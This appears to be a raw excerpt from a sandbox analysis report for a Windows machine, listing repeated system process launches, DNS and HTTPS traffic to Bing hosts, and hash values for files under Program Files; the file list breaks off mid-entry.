C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	240.221.184.93.in-addr.arpa	udp
US	8.8.8.8:53	74.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	43.58.199.20.in-addr.arpa	udp
US	8.8.8.8:53	154.239.44.20.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
US	8.8.8.8:53	38.58.20.217.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	52.111.227.14:443		tcp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	16.173.189.20.in-addr.arpa	udp

Files

C:\Program Files\7-Zip\7zFM.exe

MD5	45d3d62890fa98b808e4379a0a399baf
SHA1	5b5459717f961d20f002e3c5d3268906a71e7f73
SHA256	de96183d3d1e3c5a790c8fb31df0c6879d3bf1ca64b10be23452b58ee8e2b69e
SHA512	748cdde074183fe2780a236a9cf3e8141c5a79f492cad5656e44f706a74a58575015181d32d39bc177a4b68a045f7f0b836ba9d66e73fefe9877efb5744d6f2f

C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\readme.txt

MD5	dbac9649c4bd702f55fbd1afafe87c44
SHA1	0d914f4a809cfe400ca111ebfbd0ad552d500785
SHA256	b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127
SHA512	86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415

C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md

MD5	950ac8e007b49ed7acf1646758393817
SHA1	3a795f27aac36ba92f33165a6550cc7f201b3254
SHA256	4ab0585ac1cc953813901847e774a0a6e2542bedd0e5964cacf31e421455223e
SHA512	6bf7c6bdc1f802cdc8cea1d5a22de2e2cdf307411504499351fa5e9bdb7d1826c1968c4cc8bbb2fc17ea69850d69e0e2d77b76d29ad991813b598fc18ea0982e

C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5	f0be99f92d8b8ad3d79c9aa580fc2f08
SHA1	a9ab5160208575c2c19277491406d5c95690a5f0
SHA256	e290cb91a6aaf54bb397c8f72d0bf5e8a70935ca00abde862e3d13fdf75fdbb0
SHA512	c9c2002d0f14f1d92924f80105c4b092bcb8de5bcb838179f2129b125fbcdf83f78ee80f44b0e26bab451c6fa5d6a29547a4933a92858e310dfbbdcee32f8cae

C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml

MD5	c181d62d13f055127f354bb60cdfa03b
SHA1	6cbfcbcdb417807d7ce1ffeeaa2eaaf9b548885a
SHA256	d8dc1b9aa2aefd658fae2d9b6bf36318bdda72fcecba0538a1f121592b44e3b6
SHA512	62dd4c375f5e3299843c78dc86026da551a8a66c2c4cfac4003b8e4774ddd1cc36c130611c15182b61a472169305b75c845f17ec899e53250461867cc82abd36

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png

MD5	1dc5d31ef9205f1034b64d635d59cb32
SHA1	c172576576c5ac5a3c2912bdfd0c8365b5365513
SHA256	676d1f912a22a12ad4c80bf552355a7e0995c56e6ef7527aaa9b77e513efc065
SHA512	bc334638acb1416787df04cbaebde99cd15d96c5b96b6f950cbdfb54177fcd2f2ecce4dc9212a9a3f2f85269ac901aef147ec6297c31c5ee6cc39ee4cdac17c1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png

MD5	7d00bc0d46dcb90890a4fe6b76bc5c3a
SHA1	7159b1e1c264a6863708a971eaeca32cff864aa1
SHA256	2fcd2848cbcab1a3b8154138288cc659cd2c187412cb887eec6554b6165b8c33
SHA512	2f113cb27028aa0fa0f028b09ddcddb4a1ede6ae0823909d99763db6e5be57b1b4ae6977537ec17808cd622bc548e1ba3122e35b58de9d856400d33042234a35

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js

MD5	6e8d259daabf1168ae5136a3de48ee80
SHA1	b015257e3ae0810ddbda53c0b12991161a863ffb
SHA256	13370a65ca7e31fbf3a133156c208bf99c01a54880d55a8a4500495683e3a47f
SHA512	cf3c564c18c6b0965a431cda1ed8fa97cbeeb839d992e48f77c073bc8054ead03b4823df381c5179d3d398877da3473b92d70ae905a2bd0c7e5fc45505340113

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js

MD5	88151ac4ebd7f5ff2d381c65e68cece7
SHA1	f979db4063d15ef2e32db3c38890899bb87c78e5
SHA256	c1ea4ada9462abd4ec352dfaf670575e9caff1e55d303db96a2f2500d50d92e8
SHA512	326195f5176beed6cc39849b8d6e87a5136c41a04aa76f53c30bbed1ff74391e16a6114e236f39d403c7f82fda032c00a9ee1df583412dfea224047e51f4c3bb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js

MD5	60f1a26612dc049ce3e00fe917b6475d
SHA1	05791d089cbcd759088adbbd9483433dc9a10206
SHA256	8ced84488e1ea81e8cc3ec1a25f5b849de902601bef557b6ec65f9de2982bece
SHA512	06f080a9df9081a2bfd557165f9c21cf2bce3ee161c0896a9f9a6e0f8a3ae545b1cfaaca9ce1d46757dbe0163ddd0421bdb51558ef092dd0a6e5c2052ead4706

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png

MD5	ea321d33cfeb1d029794bd01c5b78e85
SHA1	4e04b2d8f7f23f44f96f4bbf134233e1feb5e28b
SHA256	3add439f478220ce8001abf2543810144a0d80f8116bc0ca13947c9745983c55
SHA512	f574d12330a668d89402265cf5a859a76325ed548e1730e02f51dfd36e3d5dccf2c8b75a76a8c931597bfc130a42364c73eef0200523d4eefbcf4fa5ccacddea

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png

MD5	a660ce180dea34b4944d83569f4789bc
SHA1	e3ca7b90c8bd299c49585bd29bc3fb7494c0fa4e
SHA256	03ab6f2f396e0531f1b1299b61485408cff93f183942910a7d0d5f0c7a666bd8
SHA512	9de185c0e6a8cc49852ebb454a00a7a19f5382b358327d393a6952b32099036147c1eb799cc60078bf24477e9607a1b4c88288a213a8ffcafd8d60caab0f0720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js

MD5	cdc58b2bf0a1a34f96af8fdcb62dc30b
SHA1	69eb0d674e9830e81cecdd610792225a2a5dc265
SHA256	3b5888b652cd86408bdd59e86405d3f171d23132059228544fbe693cfcb2b73c
SHA512	d8ef3220b8984f759347a0e83eb75939c914bf865db492d28e226f113b469a97325befa008886743aeae2e0f32c74c0a1e7ce8b60eaf5949b51058a618daa502

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png

MD5	55c2b47c9aea50661a855fe91eb8ac32
SHA1	13ea23a51394ea2c13420ddac1294eae6f82f846
SHA256	ba5a59d879c1f6543b46085d02f5c90fdb22e663487d3586b6533cd887c83b72
SHA512	947da2e85f5c21e7847f10d727729915973c911a47de233ef1fb97f60ae41db05f4c8c0ee655e3aa264db2067763e4134b76279f1d3ea8ad43640a64176522a3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png

MD5	808e7aedbb1da793b86c92816309035e
SHA1	b4a2fca53290a35ae222f2cdf80f68ec7eab51e6
SHA256	a90f0edb8324760029a5db9f641b05694f8717c25514b2d6abde7662c827e0cb
SHA512	0af4e6a83661378b618c40de02c6cb7244be544dcb02f1f14c83b6abd791fa0330b6d508c86f0ba8e345608639d8505a2f26d3a6d3ae201bb01319c10c212d4a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js

MD5	5c1dc195043bdea8525930a9882c10d7
SHA1	17415e551255ab016f7682d7b33451cfcb91e687
SHA256	019bad9e72430b758828953e3310007695c55fed1d25fdd707c76fec561f2bc5
SHA512	e912b84e9b4856864d302154b68adf6822189aa78859265cf8f529279e77a9d7c086452b4527ebb75d9c910ad9a6a1e95e1f45498fc168628da80739acff742e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]

MD5	8db5f9dff9d857a8827ea6d66fea4880
SHA1	ef5de087109543e49ee7fe70adb49efe27e15121
SHA256	e8c6ae3d3f05d53d58200db3f31383861d434c6abbf66f82e925321029058a10
SHA512	70723910b4bf8814f848e10390378d53d9fb67e8a319edb708edc41b5c858c1d2cfc0b86a2909e33f72062df8b32e70554fa5ebe7aad7ec474ad78087560069b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js

MD5	4e6de5201d795432e75c0628dd306b26
SHA1	80ae62145f6bc55c2a25f68ad9d6bc9fcae496db
SHA256	1265f683d27701f95b545e6201577fb4eadf5dcfbc1fc8cedb8dd39635515788
SHA512	950227253fb845bd9a4519a209d72404760492473bda8101d846ded18aef1a2f6f6ab99b1b1b2186c0eed423c151c089316e124384f214644632e6a0f4dbece3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css

MD5	89728f1ec13231dd11d2ea20afe39d67
SHA1	b4350cd128350483be389b2c865633bd1ae0f78b
SHA256	aff85e66d5b690dc0188f4c2348ca78abdc14605286128407242a4e91a684754
SHA512	58203e9c3898367c78c6d10fa629c0bd2356b2ae54e225afbcee83be1d5d297977a5a9633e773ffc2b8079a6e2eb2aa0afc530c27d29f512af40d8c9ae539adb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png

MD5	a93c09c1a326a8733b4eceb713ca7457
SHA1	90ba7a4c24bb0d424abda46b736170ea3b43e541
SHA256	d03f54aaa9216f4e32053928ce87a317341232f107140c84f73b2b6490b5a81a
SHA512	432c3400257d00391baa255d32fd03e0b8c97231d684ef35534868a38bcbf9cb70b433eacfe154c25fd3376e69592a7000a823535700f353975572c5101a56af

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js

MD5	fc4cdc00064f47d2eedf58bd02068fe1
SHA1	cbb7157d8c560e9b2cdffac3a2b831202d76d2e6
SHA256	0e8fb0e6e1dd239a2a1996059914a5ec5e753782527c1a07c62d808eb77df3e0
SHA512	753d312596fdd24d3ad87b7916c5d108d185b42beff7c750099aecb38c7a321ff04260c19492d18cc27cf8f8843c6b3facde0934e67a46e9ce4291c3646abbe8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js

MD5	c5596fa17e59cbf92a2ea2e1ad5c6f8b
SHA1	4153a71b5750685afba568403ed7522e83a9894f
SHA256	5812ebbc6311c0ff9919a27137b22435cbca3cb9fd56959b44ddb82f93609b99
SHA512	762580962300f0e0501054450772ed59cdfec76d7aa6b1944f557ccd74ec2fcd171ffd67765f2b367c526d0193eabd184f0d4ac1dadb7a0d25f00f9866f670bc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js

MD5	26645133c9de7799e35cee0e47b82ee0
SHA1	bb6be735f6814d765bbe6b3f3ce034d1767366c5
SHA256	1180e5728ff28a49eec43c61f15d49541419e79397ae58479db67b533d292d36
SHA512	c466dc886b25fea5a0e16aec28a4e784afe797f3937c7863788d0e5fa41414346bb17546d49178a48815debcca50aec3acabadc1f508fe0a3207008bc722608e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png

MD5	cc62ce00dfbe76fd8affad9c89fced8c
SHA1	75d64cc57ff45a50c066f882bfd8e3845f8fa323
SHA256	e324ff224bfa2baf51d4ab75f686195a76b8c984676c450ed660eb9ca2b36f4e
SHA512	028056e42f0eb02646752b351bb04a6b9f87ff27a2e1060b4fe4d4867118fe90f42f555ea8c645361963405583005ec4f3802c7c57729fc8616df1af09cc94dd

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js

MD5	fa904cdf440c6743078637992d58489f
SHA1	6969f407be2a1b52c5a41be256433026cabf9917
SHA256	152f6d0325802be61521bff49a8dd07063feaffeb2447d3ae6f47adf214cbffb
SHA512	c6237e56225d36d26ed594406a5bc08987bc34fac8d425dac8f909512ff19e6a27e1566651c591a38c0a5476e74dca09beb53ec15d4f08b6de2843fa064cbd3f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js

MD5	573dd292166f86741bb965ee068c3793
SHA1	169fcf0880c7a2c5993f5bf28ff64cd9ed441dd9
SHA256	ab2b7de642b66db6e6b610dab8fb3c94c972465e07b7f681127c40a6629d8c2e
SHA512	0217d582d827a7b6faa950bc726d41c4c7644ba11b19689b9e5eb60cf54df4afaefcf4eac3649e8315dc1134988dc71abcb94bd9a640829bf9d68a6ffa17241b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js

MD5	bf70043c03230a91bb5b402e7ee67e63
SHA1	2ec8302c3ebe1e34abb5e0c813abceaadfc5073c
SHA256	a8b45a4c0a3adae007e8ef6b3a0e9966d2ad0c552320210a778109e2799f6c75
SHA512	ecdf54cc56de9c49dec1e9e65aefa736201904e609474b13d089f188bf35ae46b62d1ba492f4c25ad3fd7ff584a1532be18c0115598c2deaa834b22e6e52a601

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js

MD5	7adbce4bec815b574ab3fc6d85eb1937
SHA1	7d14e52fc6aa5796996988e9feab97c31eab1e0b
SHA256	efec14a7f219aff9e96c136933c0316abbabfa082b5755a86b2745c0a8423a79
SHA512	4218fc7991ef7ab93b1fab696432fc0130f07c534b2da244ce3370e6092213db657505af8380e7a07576b16b19d7c1b58f6a5498122d73061a362162b31f5b18

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js

MD5	478f0065e127108d705114b29fb9170a
SHA1	3d954983b0594275bdbe444336baad9517129b79
SHA256	1beae6b25a652882189f27e3b52232bc3451a54eeedf3e5cb0eb827fe15032f9
SHA512	4affd4e7c23c555d99a5a1a4ff929228af723961c6cc1c320358998fbba2528e2d84d5c64a5c28fd6420ba3132fad056f2388538086d061510d80e244f7b3990

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js

MD5	661fea8b99a08e2422d8b5b9bcfd9921
SHA1	54a78f38a3599aed6d27c6fc711d7af7a205c524
SHA256	60624904ad10defbfcafa3acd5dac4c7c5040edde23bff489b6b32ea5a1403ad
SHA512	69b58c6c99f494ca1b6f2788cd17b63cc9f583b0abca870f666aedb9c504f660b03df699b69828c8ecc43a747297042eeca7e197de96dd43defb7871e2289b9c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js

MD5	3dd77972f6558af4969a57eb4f19f2d0
SHA1	d56f6ebeaf408c667bb9491845a33ddc19d18947
SHA256	cde2dda4b1709d6591356e21717833ecf9802dc119d719e9dbbc97b090158644
SHA512	68f15867e6b29cce5415ce31203cc3f1790869f85d1b1ba8b2912e9b1b570f61485e5e9aac96d9bcc069e81d298b56d8941cd94a1df72d07c7508c7fdcc7ef1b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js

MD5	95e6ecbe44dc4ab34323c697c6568b56
SHA1	0ca5debc2a7b53245ae6b7d6594ba93b3152bdee
SHA256	d3bdbdce059d04ec6e336179e6262bc694def0fcc5fe4b006953dbf178dbb30c
SHA512	af6262bf0a2b16fbd1dff7051eb0373336781c105b63631080ed2b6d38f54adbdbd16d794917fb9ad08c9ee238e0d4df732b7ef3e4c6d521a6b347eb8c2e9804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js

MD5	4fcc8af63d8fea1581c1e96e9436e913
SHA1	5c09be5c84dba1172a2503a3406223baed06f8bc
SHA256	bbce03b612d22d42e40207a0ac4b6492ab0ad8c2cf4690377929f4cad738954d
SHA512	4bb1df7206f7fee79df361d678cd250399efff9d13d3435448170efd515abb425fcbf3b6ad9d0c6da1b4a7860d33dfd15daaa199e96dcdd701afb3b80234f2d6

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js

MD5	21a5d65fbcf76ed1b8e9489d3bb051f7
SHA1	dcfde89bb81642e0b1bcb2b4d8c0fe574e912950
SHA256	f054ff5e3f41e79c647bd03dc9ad1bad42f8292c7e7b839088faeb8abc182ff4
SHA512	566bc1f2c5f4b2b9888c8e414552c25609d2562e10a8abddf6f036a6cbe2bc7644cbe850311224c25db96380c0e11fb07800f965305f41e068968bee530c320a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js

MD5	0e038344281f0aa0a74103dd77048888
SHA1	163a5a2d3888eb23ecc17b53865742f3eb7aa3c1
SHA256	f3a76de64a79cd7afa5438bb0a4f4330a97497246fe00f7b29fb690e2ffe32cd
SHA512	5988b04142669c005728510cc0a0c7507a9b8561b9d3178e3ef06b77a725e5e3ab7c13faf2998522c601285e823d3f72edbe7b93ba6b14a9c5afefbacb974560

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js

MD5	c4b091c93a4910ecfc619efdf3c56111
SHA1	4147f571dfd1d77b6a6943c57784820bd0cba24c
SHA256	d30e4139d68728b1c0b7c0fdccf649fc98c269f0d57c08e1d2033c13f162c29a
SHA512	b276ec16ba3a0737c8958a7373c3b5b53d384432535e65ee5651dce90da0eaf7dad1a02479243efb0b5ea78234c0f423ebc10c82b6e28db557106b8a21db1964

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png

MD5	65afdbfd57a964a5525ef68ca68cb5f4
SHA1	986fd9886e54eaa35b90561c94b00f85eb758711
SHA256	322fa7539ee1552758dbb051fe1199a7b4b247ec8335fb35cabf043d8947466d
SHA512	88b2d9c205d6fa4fb7823fa118fb95c651977cbaf1b54445ced380d34541e5367a218de4335a341b3994839386b487fcc33718b749ab2e05678ae87e0da1dbd7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png

MD5	2870d12e27e8a50bf66493145c06939a
SHA1	f4319fc28ae1f99e359b5cfbd4c8c69af67dc03e
SHA256	dd6fda1bd17d115065254a8af134a7906d8e15e2725b01223582c3add3240272
SHA512	39b2281464998cd9f3d87659cdf7f3f2690a82bb8093ac64d5141d837dd4f951514cf0fcbfc02a0102f3d8ce780805886a361c649d6df2347db60b383442e5d0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png

MD5	d1dfee6d7b14e63f64c349b2cae8ad27
SHA1	fd382215ff99c0993d8924f18ff7912b4835f4ad
SHA256	b63bba00ed3b7a86b6ed36ab7d6eede57656454e0a583b875d34ee19466714e4
SHA512	220e189bc67b20bef3f92da6dd063b12fd53436c6fa9e728553669e4d42dbe595c52801e68a929797c48dc56fa4ff47919aa3d065363ce881e207abc83f7de77

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png

MD5	598b166da1d843121d50f9593073a15e
SHA1	e41c87d8fa9aa263dfe783bdd692556fb8e24f43
SHA256	c46d21ff4c32097f172b4e99b5794374ed4a1cb025040d157f611f43929e98d5
SHA512	107ceb56129c1baade5930cea77fdc9c53264ff06b92936a5823c483235ffce8ab4ca3efef5001c5cc16eb3351b663877e1e4184749ba33d785b4927fe2f2db1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png

MD5	48a2c150eaa7d9fe84e7e31163e67495
SHA1	cfd5375b61328af47b784d2e1229c95c9355ce06
SHA256	ff1d90818c6ec24ad8dc4334bed7e72b3ceb9460cdfe3b25ec24d2b31b4c9288
SHA512	e6abeeb5ed043270c9148b58fa359d8536e0a9606aaed86446f3cc3ef14a855b711a86869d02fe27f50ef79b91895c77bc970c6ccf962caeb8311984c4778410

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png

MD5	34300ee4cd847a5329747c2294699c1f
SHA1	5e1086c8ebeaf9205517c82d8ae1711931ec48e1
SHA256	122650bd6eea6dc3c3cde5c472c78fe200967b33c6e3f3d2f394d8fb66c3acfe
SHA512	ecea239cb49cc1b9018e9d5bc34fa0d501cd9dc6bd7a8c01b8a2bfe9cb8d9baf805081d3705f0f986903a93a35a3ddcb852463bc2698606b556999cd0608ad6e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png

MD5	d82b1439dcd0ea62ce3edcf6d36eac1e
SHA1	f5216b9a0c6b294584b24a5fd50b43e79d46310e
SHA256	44f25bfcbff16b8e7c81ac93d6dcbc312035c81ba6d62e61d4177e23ef62dbff
SHA512	bc789786f1261ce50116190f56ce7da3063fb944af6e5da17fd0a61e51d3d25b11fc09a83d2fd1805e16f33c2c469bd28d05366b8fff7faa85d3dd498e5e3d1a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png

MD5	7d1b0ec51595563c9214ddfdec36f303
SHA1	bbb988973a8281943b5bfacb8ab03d97c0f0f398
SHA256	c915635ac032617e1acf87810abd8e8d9825c7e40a74245bc9efcf31d6da9da9
